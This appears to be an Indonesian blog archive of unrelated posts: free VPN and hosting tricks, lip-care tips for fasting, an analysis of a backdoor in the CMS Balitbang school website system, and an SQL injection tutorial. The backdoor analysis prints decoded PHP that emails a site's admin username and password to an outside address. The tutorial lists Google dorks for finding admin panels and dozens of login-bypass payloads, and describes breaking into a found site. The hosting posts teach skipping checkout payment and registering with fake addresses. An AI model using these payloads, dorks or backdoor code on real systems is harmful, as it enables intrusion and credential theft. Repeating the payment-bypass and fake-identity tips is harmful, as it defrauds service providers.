Halaman

    Social Items

Welcome back. hehe oh iya kali ini mimin mau berbagi trik cara mendapatkan VPN gratis rasa premium nih! Langsung aja yaaa

#1
Masuk ke situs seed4.me dan daftar seperti biasa

Jika sudah masukan kode kupon OCTSD1YEAR

#2
Setelah itu cek email kalian untuk mengaktifkan akun vpn kalian


Klik link yang di berikan oleh pihak website.

#3
Setelah konfirmasi email, kalian scroll kebawah dan setup akun vpn kalian, disitu juga tersedia untuk beberapa os pc (komputer) seperti windows macOS dan linux.



Nah sampai sini paham kan? Sekian terimakasih.

Cara Mendapatkan VPN Gratis Premium dari Seed4.me

Nahh guys! Kali ini ane mau bagi-bagi hosting gratisan lagi nih. Langsung aja yaa! Letss goo

#1
Kalian pergi ke slashy.host

Ketik nama domain kalian dan klik use lalu tunggu hingga loading selesai.
#2
Lalu klik continue dan checkout


#3
Nah lalu register saja, pada menu email kalian harus memasukan email yang valid!

Karna sebelum nya saya sudah daftar atau register, saya langsung login saja tanpa harus mendaftar kembali.

Setelah itu kalian klik complete order 
#4 

Loh kok malah suruh bayar mas? Tenang aja ada trik nya! Kalian tinggal klik saja tombol back atau semacam nya lihat cursor saya

#5
Setelah itu klik menu service dan pilih my service




Good job! Work dan langsung aktif, tapi kalau gratisan ini banyak minus nya sob. Maka dari itu gunakanlah sesuai kebutuhan ya!

Cara Mendapatkan Hosting Gratis Dari Slashy Host Unlimited

Web hosting sangat dibutuhkan untuk menjalankan suatu website. Untuk pengguna wordpress, web hosting terbaik merupakan suatu keharusan. Layanan web hosting menjadi hal wajib diketahui oleh para pecinta blog selfhosted wordpress, apalagi jika layanan web hosting tersebut gratis dan memiliki fasilitas hosting terbaik pasti menjadi idola para pemain web hosting gratisan.
Untuk saat ini selfhosted wordpress banyak digunakan oleh para webmaster untuk berbagai jenis website. Mulai dari website sederhana seperti blog sampai dengan website kompleks seperti situs berita, online store, dan lain sebagainya menggunakan wordpress. Beberapa website besar yang menggunakan wordpress adalah, BBC AmericaNASAMicrosoft News dan masih banyak lagi.
Bagi anda yang belum cukup dana untuk menyewa web hosting, ada baiknya menggunakan penyedia jasa layanan web hosting gratis. Selain gratis, layanan web hosting gratis juga terkadang memberikan pelayanan terbaik sebanding dengan web hosting premium yang berbayar.
Jika anda belum memiliki dana untuk membeli layanan web hosting berbayar ada baiknya anda menggunakan layanan web hosting gratis. Apalagi anda hanya ingin mencoba-coba themes atau plugin nulled ada baiknya menggunakan web hosting gratis terlebih dahulu agar tidak terjadi hal yang tidak diinginkan seperti website anda terkena hack oleh para hacker yang tidak bertanggung jawab.
Berikut step-step Cara Mendapatkan Hosting Gratis 1 Tahun dari Kyro Richards Website Hosting
1. Kunjungi link wkdienste.co.za
Pilih i Will use my nameserver, contoh lihat gambar, lalu klik continue
2. Masukan nama website kalian
Dan klik continue lagi, contoh lihat gambar nomor 2.
3. Daftar akun baru dan klik checkout, saran saya pakai fake adress generator


Nah setelah itu, tunggu hingga proses selesai dan cek email kalian untuk verifikasi.

4. Nah jika muncul seperti di gambar berarti berhasil.


Langsung saja klik continue to client area.

5. Setelah itu klik menu service, jika status nya sudah aktif berarti kalian berhasil guys! Congrats.


Dan itu beberapa list hosting gratis yang saya daftarkan, jadi total nya ada 6 status yang aktif! Mantap bukan?..

Oh iya, data-data login cpanel nya akan di kirim via gmail, oleh karena itu cek folder spam anda. Lihat gambar

Cara Mendapatkan Hosting Gratis 1 Tahun dari Kyro Richards Website Hosting

Cara Mengatasi Bibir Kering saat Puasa - Ketika menjalani ibadah puasa selama bulan Ramadan, tiba kamu harus menahan dahaga selama seharian. Cairan tubuh yang masuk ke tubuh kamu hanya sedikit dan menyebabkan badan kita lemas dan gampang ngantuk.
Selain itu, kamu akan merasakan bibir kamu sangat kering dan mungkin bisa sampai pecah-pecah. Walaupun bukan masalah yang besar, tapi untuk sebagian orang pasti sangat mengganggu keseharianmu.
Berikut ini cara mengatasi bibir kering dan pecah-pecah saat puasa!

Cara Mengatasi Bibir Kering saat Puasa Ramadan

1. Minum Air Putih yang Cukup




cara mengatasi bibir kering saat puasa, tips agar bibir tidak kering saat puasa
Sumber Gambar: Health Line

Dengan kamu banyak meminum air putih saat sahur kamu akan mempunyai cadangan air dalam tubuh kamu, sehingga kamu akan terhindar dehidrasi pada siang harinya.
Tidak hanya saat sahur, ada baiknya kamu juga minum banyak air putih saat berbuka agar tubuh kamu juga mempunyai pencernaan yang lancar di dalamnya.
Sebagai masukan, saat baru berbuka atau akan makan, pastikan kamu meminum setidaknya satu gelas air putih. Kemudian minum satu hingga dua gelas air putih lagi setelah selesai makan. Ini akan membantu memperlancar metabolisme tubuh.

2. Kurangi Makan Gorengan dan Pedas




cara mengatasi bibir kering saat puasa, tips agar bibir tidak kering saat puasa
Sumber Gambar: NDTV Food

Gorengan dan pedas membutuhkan air yang banyak untuk meredakan minyak dan pedas. Badan kamu akan cepat merasa kering karena minyak dan gorengan. Jika badan kamu terasa kering pasti bibir kamu juga akan terasa kering dan pucat.

3. Konsumsi Madu




cara mengatasi bibir kering saat puasa, tips agar bibir tidak kering saat puasa
Sumber Gambar: Pexels

Madu adalah salah satu cara yang paling mujarab dan dipercaya efektif untuk mengatasi bibir kering saat berpuasa. Madu bisa dikonsumsi langsung atau bisa juga diolesi ke bibir.
Namun, untuk menghindari cairan madu membatalkan puasa, usahakan untuk mengolesi madu ke bagian bibir di malam hari, sebelum makan sahur dan setelah berbuka.
Jadi saat berpuasa di siang hari bibirmu bisa lebih terhindar dari rasa kering dan pecah-pecah.

4. Perbanyak Sayuran




cara mengatasi bibir kering saat puasa, tips agar bibir tidak kering saat puasa
Sumber Gambar: Food Recipes

Selama masa puasa tubuh kita akan secara alami akan mengalami detoksif atau membuang racun yang selama ini menumpuk. Memakan sayuran segar akan mengoptimalkan regenerasi pada tubuh kita.
Selain itu, dengan makan sayur kamu akan jarang mengalami bibir kering dan pecah-pecah karena kandungan ion dan air dalam sayuran tinggi.

5. Gunakan Lip Balm




tips dan cara mengatasi bibir pecah pecah saat puasa
Sumber Gambar: Themocracy

Tidak hanya untuk wanita, pria pun juga dapat memakainya karena akan membuat bibir kamu tampak alami dan tidak kering. Selain itu jugalip balm adalah salah satu perawatan untuk bibir kamu agar sehat.
Saat berpuasa, pilihlah lip balm yang natural tanpa perasa dan juga wewangian untuk menghindari makruh.

6. Hindari Menjilati Bibir




tips dan cara mengatasi bibir pecah pecah saat puasa
Sumber Gambar: American Society of Plastic Surgeons

Dengan kamu menjilati bibir kamu akan mengira bibir kamu akan terlihat basah dan tidak akan kering bukan? Semua itu salah, kenyataannya jika kamu terus-terusan menjilati bibir kamu dengan liur akan membuat bibir kamu kering.
Pada dasarnya bibir memiliki minyak alami untuk membuatnya tetap lembap. Namun, minyak alami ini akan hilang jika bibir sering dijilat. Hal inilah yang membuat bibir terlihat kering dan kusam.

7. Jangan Menggigiti atau Mengelupas Kulit Bibir




tips dan cara mengatasi bibir pecah pecah saat puasa
Sumber Gambar: Genevieve Magazine

Mengelupas kulit bibir yang halus dan tipis dapat menyebabkan rasa sakit dan bibir berdarah. Selain itu, dapat memperlambat proses pemulihan pada bibir. Pada saat puasa segalanya akan berjalan lambat pada proses penyembuhan karena tidak adanya asupan makanan yang cukup untuk mendukungnya.
Oleh karena itu, jangan pernah menggigit bibir kamu karena selain akan luka, dan akan dapat menambah pecahan pada bibir kamu.

8. Hindari Minuman Berkafein




tips dan cara mengatasi bibir pecah pecah saat puasa
Sumber Gambar: Reader’s Digest

Konsumsi minuman yang mengandung kafein bisa meningkatkan risiko bibir kering. Terlalu banyak mengonsumsi minuman yang mengandung kafein, seperti kopiteh, atau cokelat, dapat membuat kulit kering dari dalam.
Oleh sebab itu, kamu wajib menghindari minuman berkafein saat sahur dan berbuka puasa. Tidak hanya membuat bibir menjadi kering dan pecah-pecah, minuman tersebut juga dapat memperberat kerja sistem pencernaan.
Akibatnya, puasa seharian terasa tidak nyaman dan terganggu.
Bibir indah adalah dambaan semua orang. Di bulan puasa ini bibir akan lebih rentan kering dan pecah-pecah. Semoga tips tadi dapat membantu kamu untuk menghindari bibir pecah-pecah, sehingga kamu dapat menjalani hari-hari kamu dengan nyaman!

8 Tips dan Cara Mengatasi Bibir Kering saat Puasa Ramadan


Kali ini kami ingin membongkar skandal perogramer CMS Balitbang yang di gunakan oleh banyak lembaga pendidikan SD,SMP dan SMA/K, Sebuah sistem Model Website Sekolah yg di rancang oleh kajianwebsite.org dengan Balitbang Kemdiknas RI , hingga saat ini yang menggunakan sistem tsb berkisar 100 ribu lebih lembaga pendidikan baik SD,SMP dan SMA/K.
Awal cerita rekan kami sebut saja “Mawar” dari salah satu lembaga pendidikan ingin meningkatkan IT di lembaganya salah satunya membangun sebuah website resmi. Dari informasi yg kami dapat Mawar di tawari untuk menggunakan sistem CMS Balitbang tsb karena pemakainya sudah sangat banyak dan ada pelatihanya oleh petinggi di lembaga tsb. Mawarpun kemudian konsultasi dengan kami bagus atau tidak sistem tsb di gunakan.
Kamipun mulai menacari tahu tentang sistem CMS Balitbang tsb dari berbagai sumber dan di dapat banyak sekali penggunaya di seluruh Indonesia dan kamipun melihat ada pelatihanya juga kami berpikir wajarlah itu sistem yg bangun sekelas Kementrian, dengan keyakinan hal tsb kamipun mulai mencari dimana bisa mendapatkan CMS Balitbang tsb akhirnya ketemu dan kami download versi terbarunya “CMS Balitbang 3.5.2”.
Kami mulai membentuk tim di medan terdiri dari 5 anggota, kita semua sepakat akan melakukan analisa 1 hari dengan sistem tsb. Hari berikutnya pun tiba, semua anggota sudah siap menyapaikan hasilnya.
1. Di temukan sebuah bug upload yg sangat berbahaya di versi sebelumnya versi 3.4
2. Ini yg kami tidak habis pikir, terdapat celah yg sengaja di buat oleh sang programer di semua versi termasuk versi CMS Balitbang 3.5.2.
Pembahasan

1. Masalah bug itu wajar namanya sistem tidak ada yg sempurna dan walau sempat menjadi target oleh kawan2 yg jahil untuk melakukan hacking di sistem tsb “anda bisa cek di google banyak sekali tutor hack sistem tsb” tapi masalah bug ini selesai setelah di rilis versi terbarunya.
2. Hal yg paling kami sorot adalah hal yg ke dua ini tentang penanaman backdor/celah oleh sang programer, sebenarnya kami sering menumukan hal seperti ini di banyak CMS yg pernah kami teliti, tapi yg membuat kami mengelus dada adalah ini sistem yg di rancang bersama Kemdiknas RI.
Hal Teknik

Jadi inti nya di sistem tsb telah di taruh sebuah file yg di rancang untuk mengirim User dan Password dari admin yg memakai sistem tsb ke salah satu email.
Kami sebut saja filenya bernama “admin2.php” di letakan di folder “functions”
Kode yg terdapat dalam file tsb sebagai berikut:
=====
<?php eval(gzinflate(base64_decode(base64_decode(“==”)))); ?>
=======
Terlhiat sangat jelas sang programer sengaja merahasiakan isi kode script yg asli dengan meng’enkripsi seperti yg terlihat di atas. Kamipun berusaha cari tahu apa yg ada di balik kode tsb dengen mencoba mendecrypt code tsb tapi kok masih ter’encrypt ……. ?? ternyata sang programer sengaja membuat encrypt tsb samapi 7 kali perulangan 😀 itu mungkin di lakukan untuk mengecoh bila ada yg ingin mendecrypt
Hasil Decrypt:
=======
include “koneksi.php”;
include “fungsi_pass.php”;
data = “”;
$query=”select userid, count(menu) as jum from user_level group by userid order by jum desc “; $alan=mysql_query($query) or die (“query gagal”);
if($row=mysql_fetch_array($alan)){
$query2=”select * from user where userid=’$row[userid]’ “;
$alan2=mysql_query($query2) or die (“query gagal”);
$r=mysql_fetch_array($alan2);
$data .=”top admin : $r[username] —– Password : “.unhex($r[password],82).””;
}
$data .= “”;
$email = unhex(“64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3”,82);
$headers = “From: \”Komunitas $nmsekolah\” <$webmail>\r\n”;
$headers .= “Content-type: text/html\r\n”;
mail($email, “Komunitas $nmsekolah :: Pesan baru ::”, $data, $headers);
echo “Pesan terkirim”;
========
Nah itulah kode yg asli dari situ kami bisa jelasakan bahwa inti barisan kode tsb
1. Mencari data user dan password yg mempunya hak akses penuh dalam sistem tsb
2. Melakukan peracangan format email yg di sertai dari data user dan password yg di dapat tadi.
3. Menetukan email yg akan di tuju di sini email pun di ecrypt lagi 🙂 perhatikan baris kode
– “$email = unhex(“64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3″,82);” di encrypt menggunnkana fungsi “unhex” fungsi “unhex” itu pun di buat sendiri oleh programer. Setelah kami berusaha mendercypt di hasilkan sebuah alamat email “alanrm82@yahoo.com” itulah email tujuan nya.
4. Melakukan perintah pengiriman format email yg tadi telah di rancang dengan beserta ada user dan password sistem tsb ke email “alanrm82@yahoo.com”.
Dengan itu sang programer dapat setiap saat masuk ke sistem di lebih dari 100 Ribu lembaga pendidikan yg menggunakan sistem tsb secara tidak sah.
Kami menyarankan bagi pengguna sistem CMS Balitbang yg melihat artikel ini untuk di kroscek ulang tentang sistem yg anda gunakan mengenai privasi dan keamanan data yg ada di Lembaga pendidikan anda.
Masuk peristiwa awal kami pun menyarakan agar Mawar rekan kami untuk tidak menggunakan sistem CMS Balitbang tsb.
Mungkin Pesan kami buat kawan2 Programer janganlah menjatuhkan harga diri anda sendiri denga hal2 konyol seperti kasus yg kami bahas ini.

Ada Klarivikasi di komentar dari salah satu anggota tim CMS Balitbang kami masukan di sini :

Choirul Anam
“Saya baru saja mendapatkan link pembicaraan ini dari seorang kenalan. Saya adalah salah satu anggota team yang ikut andil dlam melahirkan CMS ini. Saya akan klarifikasi. Teman2 mohon tidak langsung menjustifikasi negatif tentang pemasangan backdor tersebut. Ini ada latar belakangnya. Pada awal kelahirannya dulu CMS ini tidak hanya dipakai oleh sekolah, tetapi dipakai juga oleh dunia bisnis, bahkan pemasangannya dibisniskan oleh beberapa pengembang website komersial. Kita tidak menginginkan hal ini terjadi. Maka disepakati pemasangan backdor ini. Intinya back dor tersebut dipasang untuk pengamanan intra, artinya jangan sampai CMS ini digunakan untuk dikomersialkan atau untuk webiste dengan isi negatif. Kita tidak punya mahsud apa2. Tidak akan mengambil keuntungan apapun dari pemasangan back dor tersebut. Dan perlu teman2 ketahui, pembuatan CMS ini bertujuan untuk mempermudah sekolah dalam membuat website, bahkan yang ikut pelatihannya akan memperoleh domain dan hosting gratis. Itu yang dapat saya klarifikasi, semoga ada manfaatnya, terima kasih”
Kami membalas
Terimakasih bung atas atensinya klarifikasi hal ini, di sinipun kami juga tidak ingin melakukan pemojokan kepada siapapun. Kami mengharap siapaun yng mengembangkan sebuah sistem opensource untuk juga mengutamakan Privasi dari pengguna sistem tsb. Mungkin ada cara lain yg bisa di lakukan selain membuat privasi pengguna terganggu untuk mennaggulangi kasus comersialisasi tsb. Coba kita ambil contoh terburuk bila sistem terjadi masalah data misal manipulasi negatif, apa bukanya pihak yg menanam backdor malah yg menjadi tujuan Fitnah. Sebelumnya terimkasih atas Klarifikasinya bung akan kami akan masukan di note kami ini.”
Choirul Anam
Sebenarnya masalah backdor itu sudah pernah ada yang memunculkan sekitar 3 tahun yang lalu dari Malang. Dan sudah dibicarakan dengan pihak Balitbang, hasilnya Balitbang meminta agar backdornya tetap ada agar bisa dipakai sebagai bahan utk memonitor jumlah pengguna CMS ini. Saya mengikuti pengembangannya sampai versi 3.50, dilakukan pada Desember 2012. Versi sesudahnya saya tidak ikut lagi karena kesibukan di sekolah semakin banyak. Untuk usulnya itu, saya akan coba teruskan ke pihak Balitbang. Terima kasih. Saya off dulu yaaa, mau berangkat ronda.
Nama Disamarkan
ngutip perkataan abang developernya, “… hasilnya Balitbang meminta agar backdornya tetap ada agar bisa dipakai sebagai bahan utk memonitor jumlah pengguna CMS ini”
apakah memonitor pengguna cms dengan cara mengirim user + pass admin ke email tertentu? apakah tidak ada cara yang lebih ‘terhormat’? saya bersyukur sekali malah, ada cms buatan anak indonesia yang bisa digunakan untuk mempermudah kelancaran proses go onlne sekolah2 di indonesia, tapi saya tidak habis pikir, kenapa bisa hal semacam ini terpikir oleh developer2 handal? ataukah ini memang sengaja di rencanakan / permintaan dari pihak balitbang sendiri? kita sebagai rakyat indonesia yang mendambakan keadilan harus memulai dari hal2 kecil seperti ini, karena kalo hal seperti ini saja tidak bisa diselesaikan, apalagi masalah besar yang lain?

Rahasia Di Balik CMS Balitbang


SQL Injection adalah salah satu teknik exploit dengan memanfaatkan kelemahan pada database. Pada umumnya ini di inject ( suntik) kedalam form yang membutuhkan input dari user, misalnya buku tamu, komentar, login user , login admin dll.
Kali ini saya akan membagi pengetahuan untuk melakukan injection ke login admin, saya tulis disini sebagai pembelajaran saja agar rekan rekan lebih aware ke keamanan databasenya. Segala resiko tanggung jawab sendiri ya, sekali lagi saya hanya menyajikan dalam kerangka edukasi.
Saya gunakan teknik yang paling sederhana yaitu menggunakan Google Dork di Google Hacking Database, untuk menemukan sasaran yang vulnerable.
Okay.. google dork yang kita akan pakai ada beberapa antara lain , cobain sendiri ya :
  • nurl:manager intitle:Admin Panel
  • inurl:/admin2/ ext:php inurk:/admin/ ext:php
  • inurl:/adminpanel/ ext:php
  • inurl:/admin_panel/
  • inurl:/login.php
  • inurl:/admin.php
  • inurl:/admin
  • inurl:/login.html
Hasilnya kira kira akan nada list seperti dibawah ini :
Demikian hasil dari Google Dork tersebut, tapi apakah semua vulnerable ? belum tentu , di step ini kita harus satu persatu mencoba dengan memasukkan SQL Injection nya.
Nah kita asumsikan sudah mendapatkan admin login , maka kita tinggal coba memasukkan kombinasi rangkaian user dan password sebagai injection nya.
User Name : 
  • ' or 1=1 limit 1 -- -+
  • "' OR 1=1 "
  • admin
Password :
  • ' or 1=1 limit 1 -- -+
  • or ‘1’=’1
  • ' or '1'='1
  • ' or 'x'='x
  • ' or 0=0 --
  • " or 0=0 --
  • or 0=0 --
  • ' or 0=0 #
  • " or 0=0 #
  • or 0=0 #
  • ' or 'x'='x
  • " or "x"="x
  • ') or ('x'='x
  • ' or 1=1--
  • " or 1=1--
  • or 1=1--
  • ' or a=a--
  • " or "a"="a
  • ') or ('a'='a
  • ") or ("a"="a
  • hi" or "a"="a
  • hi" or 1=1 --
  • hi' or 1=1 --
  • 'or'1=1'
  • ==
  • and 1=1--
  • and 1=1
  • ' or 'one'='one--
  • ' or 'one'='one
  • ' and 'one'='one
  • ' and 'one'='one--
  • 1') and '1'='1--
  • admin' --
  • admin' #
  • admin'/*
  • or 1=1--
  • or 1=1#
  • or 1=1/*
  • ) or '1'='1--
  • ) or ('1'='1--
  • ' or '1'='1
  • ' or 'x'='x
  • ' or 0=0 --
  • " or 0=0 --
  • or 0=0 --
  • ' or 0=0 #
  • " or 0=0 #
  • or 0=0 #
  • ' or 'x'='x
  • " or "x"="x
  • ') or ('x'='x
  • ' or 1=1--
  • " or 1=1--
  • or 1=1--
  • ' or a=a--
  • " or "a"="a
  • ') or ('a'='a
  • ") or ("a"="a
  • hi" or "a"="a
  • hi" or 1=1 --
  • hi' or 1=1 --
  • 'or'1=1'
Banyak amat yak ? Hahaha namanya juga mencari kelemahan supaya bisa di exploit jadi caranya ya trial and error, melakukan hacking nomor satu butuh kesabaran.
Ahaa saya coba hasil googlingan tadi , sepertinya saya menemukan salah satu yang vulnerable , kita coba masuk dengan kombinasi user and password diatas
Jeng Jeng…hasilnya :
Kan..sekarang sudah berhasil masuk ke backendnya, pada step ini kita berhasil membuktikan bahwa SQL Injectionnya berhasil, terserah hacker nya sebenarnya mau diapain saja, cuma saran saya sih sebaiknya kabari adminnya agar mereka bisa segera menutupi exploit tersebut. Saya tidak menyarankan di deface atau di rubah tampilan atau malah di rusak website nya, membangun website itu butuh tenaga dan biaya jadi ngeselin juga kalau tampilannya kena hack, saya sendiri beberapa kali kena hack juga jadi bisa ngerasain jengkelnya website itu di obrak abrik sama orang.
Solusi :
Beberapa hal yang bisa dilakukan adalah ( bahasa nya teknis banget proggraming ini ), hahahha :
  • Gunakan mysql real escape string ()
  • Gunakan mysql_query ()
  • Hapus pesan kesalahan atau ganti tampilannya, karena Error Message dapat digunakan untuk menelusuri jalur database.
  • Batasi akses permisiion ( CHMOD ) hanya kepada user yang berhak.
  • Lakukan perlindungan terhadap query SQL dengan menerapkan teknik sanitasi (mengosongkan) seluruh input yang diterima dari permintaan objek ASP (seperti: Request, Request.QueryString, Request.Form, Request.Cookies dan Request.ServerVariabbles).
  • Gunakan GreenSQL untuk melakukan penyaringan awal, disini Green SQL berlaku sebagai firewall yang akan memfilter perintah yang mengarah ke database. Kelebihan yang dipergunakan oleh GreenSQL adalah menggunakan  metoda "risk Scoring matrix". Risk Scoring Matrix itu sendiri merupakan sebuah analisa perhitungan resiko untuk melakukan proses "blocking" terhadap perintah-perintah yang dikenal sebagai perintah SQL Administrative ( Drop, Create, Alter) dan  perintah perintah SQL lain yang sifatnya membahayakan database tersebut. GreenSQL bekerja sebagai sebuah reverse Proxy, yang berarti kalau ada perintah SQL yang diberikan akan di send terlebih dahulu ke GreenSQL Server untuk dianalisa, jika hasil analisa menunjukan bahwa perintah yang dimasukkan tidak berbahaya maka akan diteruskan ke MySQL Server sebagai real database servernya.
Kesimpulan :
Teknik SQL Injection dapat digunakan untuk memanipulasi content dari sebuah website, salah satunya melewati login di bagian back end ( administrator login). Teknik ini memanfaatkan kelemahan pada database. Oleh karena itu diperlukan usaha untuk memproteksi database tersebut sedemikian rupa sehingga hasil inputan user tidak bisa digunakan untuk membypass login admin atau bahkan untuk men deface ( mengganti tampilan website)


Referensi

SQL Injection Ke Admin Panel